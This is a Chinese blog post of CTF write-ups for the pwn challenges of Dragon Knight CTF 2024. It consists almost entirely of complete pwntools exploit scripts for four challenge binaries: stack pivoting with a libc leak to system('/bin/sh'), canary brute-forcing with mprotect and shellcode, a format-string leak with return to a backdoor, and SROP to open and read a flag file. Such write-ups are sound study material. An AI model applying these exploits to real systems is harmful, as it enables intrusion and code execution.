feichai's Blog
0%

Dragon Knight CTF 2024 pwn wp

发表于 更新于 分类于
本文字数: 7k 阅读时长 ≈ 6 分钟

Dragon Knight CTF 2024 pwn wp

stack

非常经典的栈迁移例子

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
from pwn import *
from pwn import p8,p16,p32,p64,u32,u64
context.arch = 'amd64'
#context.log_level = 'debug'
context.terminal = ['gnome-terminal', '-e']
local_file = '/home/feichai/ctf_file/pwn'
elf=ELF(local_file)
local_libc = '/home/feichai/ctf_file/libc-2.31.so'
libc=ELF(local_libc, checksec = False)

def start():
    if args.GDB:
        gdbscript = '''
        '''
        io = process(local_file)
        gdb.attach(io, gdbscript)
    elif args.PROCESS:
        io = process(local_file)
    else:
        io = remote("challenge.qsnctf.com", 31728)
        
    return io

def lg(s, addr):
    return info(f'\033[1;33m{f"{s}-->0x{addr:02x}"}\033[0m')

r   = lambda a:   io.recv(a)
ru  = lambda a:   io.recvuntil(a)
s   = lambda a:   io.send(a)
sa  = lambda a,b: io.sendafter(a,b)
sl  = lambda a:   io.sendline(a)
sla = lambda a,b: io.sendlineafter(a,b)

io = start()

def exp():

    puts_plt=elf.plt.puts
    puts_got=elf.got.puts
    
    pop_rdi = 0x0000000000401210
    leave_ret = 0x00000000004011be
    bss = 0x404040 + 0x500
    pop_rbp = 0x000000000040115d
    
    pd = b'a'*0x100+p64(bss+0x100)+p64(0x40118F)
    sa(b'pivoting?',pd)
    
    pd=p64(pop_rdi)+p64(puts_got)+p64(puts_plt)
    pd+=p64(pop_rbp)+p64(bss+0x500)+p64(0x40118F)
    pd=pd.ljust(0x100,b"\x00")+p64(bss-0x8)+p64(leave_ret)
    sa(b'pivoting?',pd)
    
    leak_libc = u64(ru(b'\x7f')[-6:].ljust(8,b'\x00'))
    libc_base = leak_libc-libc.symbols[b'puts']
    libc_system = libc_base + libc.symbols[b'system']
    bin_sh_addr = libc_base + next(libc.search(b'/bin/sh'))
    
    pd=p64(pop_rdi)+p64(bin_sh_addr)+p64(libc_system)
    pd=pd.ljust(0x100,b"\x00")+p64(bss+0x500-0x100-0x8)+p64(leave_ret)
    
    sa(b'pivoting?',pd)

    
    io.interactive() 

if __name__=='__main__':
    exp()

canary

爆破canary然后用mprotect提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
from pwn import *
from pwn import p8,p16,p32,p64,u32,u64
context.arch = 'amd64'
#context.log_level = 'debug'
context.terminal = ['gnome-terminal', '-e']
local_file = '/home/feichai/ctf_file/pwn'
elf=ELF(local_file)

def start():
    if args.GDB:
        gdbscript = '''
        '''
        io = process(local_file)
        gdb.attach(io, gdbscript)
    elif args.PROCESS:
        io = process(local_file)
    else:
        io = remote("challenge.qsnctf.com",30537)
        
    return io

def lg(s, addr):
    return info(f'\033[1;33m{f"{s}-->0x{addr:02x}"}\033[0m')

r   = lambda a:   io.recv(a)
ru  = lambda a:   io.recvuntil(a)
s   = lambda a:   io.send(a)
sa  = lambda a,b: io.sendafter(a,b)
sl  = lambda a:   io.sendline(a)
sla = lambda a,b: io.sendlineafter(a,b)

io = start()

def exp():

    ru(b'input:\n')
    canary = b'\x00'
    for k in range(7):
        for i in range(256):
            #sleep(0.1)
            s(b'a'*0x108 + canary + p8(i))
            aa = ru(b'\n')
            print(i)
            if b'smashing' in aa:
                ru(b'\n')
            else:
                canary += p8(i)
                print(b"canary: " + canary)
                break
    
    pop_rdi = 0x00000000004018c2
    pop_rsi = 0x000000000040f23e
    pop_rdx = 0x00000000004017cf

    pd = b'a'*0x108 + canary + b'A'*8

    got_plt = 0x4c1000
    call_mprotect = 0x449774
    call_read = 0x448920

    pd += p64(pop_rdi) + p64(got_plt)
    pd += p64(pop_rsi) + p64(0x1000) 
    pd += p64(pop_rdx) + p64(7)
    pd += p64(call_mprotect)
    
    pd += p64(pop_rdi) + p64(0)
    pd += p64(pop_rsi) + p64(got_plt)
    pd += p64(pop_rdx) + p64(0xff)
    pd += p64(call_read) + p64(got_plt)

    s(pd)
    sleep(0.1)
    sc = asm(shellcraft.sh())
    s(sc)

    
    io.interactive() 

if __name__=='__main__':
    exp()

ez_quiz

解密不太会,用gpt写的,然后就是eval计算,fmt泄露基址,溢出返回backdoor

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
from pwn import *
from pwn import p8,p16,p32,p64,u32,u64
context.arch = 'amd64'
#context.log_level = 'debug'
context.terminal = ['gnome-terminal', '-e']
local_file = '/home/feichai/ctf_file/ez_quiz'
elf=ELF(local_file)
local_libc = elf.libc.path
libc=ELF(local_libc, checksec = False)

def start():
    if args.GDB:
        gdbscript = '''
        b *$rebase(0x1E71)
        '''
        io = process(local_file)
        gdb.attach(io, gdbscript)
    elif args.PROCESS:
        io = process(local_file)
    else:
        io = remote("challenge.qsnctf.com", 30162)
        
    return io

def lg(s, addr):
    return info(f'\033[1;33m{f"{s}-->0x{addr:02x}"}\033[0m')

r   = lambda a:   io.recv(a)
ru  = lambda a:   io.recvuntil(a,drop=True)
s   = lambda a:   io.send(a)
sa  = lambda a,b: io.sendafter(a,b)
sl  = lambda a:   io.sendline(a)
sla = lambda a,b: io.sendlineafter(a,b)

io = start()

def exp():
    sla("Please give me your token:",'DRKCTF{P13@s3_1e@k_thE_addr_0f_7he_cAnARy_@nd_pie}')
    ru('Right!')
    ans = eval(ru('='))
    sla('?',str(ans))

    sla('gift:\n','%13$p%11$p') # 6
    leak_pie = int(r(14),16)
    canary = int(r(18),16)
    lg('leak_pie',leak_pie)
    lg('canary',canary)

    pie_base = leak_pie - 0x2042
    backdoor = pie_base + 0x1426
    pd = b'a'*(0x30-8)+p64(canary)+p64(1)+p64(backdoor)
    sl(pd)


    io.interactive() 

if __name__=='__main__':
    exp()

srop_seccomp

题目即考点,基础题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
from pwn import *
from pwn import p8,p16,p32,p64,u32,u64
context.arch = 'amd64'
#context.log_level = 'debug'
context.terminal = ['gnome-terminal', '-e']
local_file = '/home/feichai/ctf_file/chall'
elf=ELF(local_file)

def start():
    if args.GDB:
        gdbscript = '''
        '''
        io = process(local_file)
        gdb.attach(io, gdbscript)
    elif args.PROCESS:
        io = process(local_file)
    else:
        io = remote("challenge.qsnctf.com", 30374)
        
    return io

def lg(s, addr):
    return info(f'\033[1;33m{f"{s}-->0x{addr:02x}"}\033[0m')

r   = lambda a:   io.recv(a)
ru  = lambda a:   io.recvuntil(a)
s   = lambda a:   io.send(a)
sa  = lambda a,b: io.sendafter(a,b)
sl  = lambda a:   io.sendline(a)
sla = lambda a,b: io.sendlineafter(a,b)

io = start()

def exp():

    bss = 0x404060
    mov_rax_0xf = 0x0000000000401193
    syscall = 0x000000000040118a
    flag_addr = bss+0x400
    leave_ret = 0x000000000040136c
    ret = 0x0000000000401016

    sigopen = SigreturnFrame()
    sigopen.rax = 2
    sigopen.rdi = flag_addr
    sigopen.rsi = 0
    sigopen.rdx = 0
    sigopen.rsp = bss+0x108
    sigopen.rbp = bss+0x108
    sigopen.rip = syscall
    
    sigread = SigreturnFrame()
    sigread.rax = 0
    sigread.rdi = 3
    sigread.rsi = bss + 0x700
    sigread.rdx = 0x100
    sigread.rsp = bss+0x218
    sigread.rbp = bss+0x218
    sigread.rip = syscall
    
    sigwrite = SigreturnFrame()
    sigwrite.rax = 1
    sigwrite.rdi = 1
    sigwrite.rsi = bss + 0x700
    sigwrite.rdx = 0x100
    #sigwrite.rsp = bss+0x320
    #sigwrite.rbp = bss+0x320
    sigwrite.rip = syscall

    pd = p64(mov_rax_0xf)+p64(syscall)
    pd += bytes(sigopen)

    pd += p64(0x1)+p64(mov_rax_0xf)+p64(syscall)
    pd += bytes(sigread)

    pd += p64(0x1)+p64(mov_rax_0xf)+p64(syscall)
    pd += bytes(sigwrite)

    pd = pd.ljust(0x400,b'\x00')+b'flag\x00'

    sa(b'easyhack',pd)

    pd = b'a'*0x2a+p64(bss-8) + p64(leave_ret)
    sa(b'SUID?\n',pd)

    io.interactive() 

if __name__=='__main__':
    exp()
-------------本文结束感谢您的阅读-------------

欢迎关注我的其它发布渠道